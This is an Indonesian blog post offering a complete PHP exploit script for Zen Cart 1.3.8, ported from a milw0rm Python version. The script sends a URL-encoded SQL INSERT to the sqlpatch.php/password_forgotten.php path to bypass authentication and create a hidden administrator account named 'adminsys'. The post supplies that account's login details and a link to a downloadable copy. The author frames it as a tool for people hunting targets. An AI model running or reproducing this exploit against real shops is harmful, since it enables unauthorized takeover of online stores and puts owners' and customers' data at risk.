Zen Cart SQL Execution Exploit php

Lama nggak update blog...
ahkir ahkir ini banyak anak anak yang cari cari target zencart.
iseng aku coba rubah zen.py yang berbasis phyton di milw0rm ke php.

jalan kan scripts php dibawah ini kalau hasilnya done
coba login adminya dengan

username : adminsys
password : wew

ini scriptsnya:
http://noscan.xp3.biz/zen.txt

#!/usr/bin/php

if($argc < 2)
{
echo "
==============================================
Zen Cart 1.3.8 Remote SQL Execution Exploit
==============================================


root@irvian ~# php zen.php http://target.com
==============================================
";exit(1);
}

function gets($url,$post=null) {
$hajar = curl_init();
curl_setopt($hajar,CURLOPT_URL, $url);
curl_setopt($hajar, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($hajar, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($hajar, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);

curl_setopt ($hajar, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($hajar, CURLOPT_TIMEOUT, 0);

if($post != null)
{
curl_setopt ($hajar, CURLOPT_POST, true);
curl_setopt ($hajar, CURLOPT_POSTFIELDS,$post);
}

$result = curl_exec($hajar);
curl_close($hajar);
return $result;
}

$url = $argv[1];

$sql = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (56, 'adminsys', 'admin@irvian.info', '617ec22fbb8f201c366e9848c0eb6925:87');
";
$enc = urlencode($sql);
$form = $url."/admin/sqlpatch.php/password_forgotten.php?action=execute";

$req = gets($form,"query_string=$enc");

if(preg_match("/1 statements processed/i", $req)){
echo "\n[!]Done";
}
else{
echo "\n[!]failed";}